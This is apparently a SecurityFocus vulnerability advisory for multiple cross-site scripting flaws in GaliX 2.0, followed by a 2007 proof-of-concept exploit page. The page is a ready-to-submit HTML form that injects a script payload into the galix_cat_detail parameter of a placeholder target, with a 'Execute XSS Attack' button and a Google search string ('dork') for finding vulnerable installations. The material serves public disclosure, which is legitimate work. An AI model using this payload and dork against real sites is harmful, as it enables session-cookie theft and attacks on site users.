source: https://www.securityfocus.com/bid/24066/info GaliX is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials and to launch other attacks. GaliX 2.0 is vulnerable to these issues; other versions may also be affected. <!-- GaliX� v2.0 - Cross-Site Scripting Exploit Multiple Vulnerable Variables: galix_cat_detail_sort, galix_cat_detail, galix_gal_detail, galix_cat_detail Vulnerable: Galix v2.0 (other versions should also be vulnerable) Google d0rk: "GaliX� v2.0" John Martinelli john@martinelli.com RedLevel Security RedLevel.org April 18th, 2007 !--> <html> <head><title>GaliX� v2.0 - Cross-Site Scripting Exploit</title><body> <center><br><br><font size=4>GaliX� v2.0 - Cross-Site Scripting Exploit</font><br><font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a> of <a href="http://redlevel.org">RedLevel Security</a><br><br>Google d0rk: <a href="http://www.google.com/search?hl=en&q=GaliX%C2%B2+v2.0">"GaliX� v2.0"</a></font><br> <br><br> <form action="http://www.example.com/path/index.php" method="post"> <input name="galix_action" type="hidden" value="galery"> <input name="galix_cat_detail" size=75 value="<"<<script>alert(1);</script>"> <input name="galix_cat_detail_sort" type="hidden" value="1"> <input name="galix_language_change" type="hidden" value="1"> <input type=submit value="Execute XSS Attack" class="button"> </form> </body></html>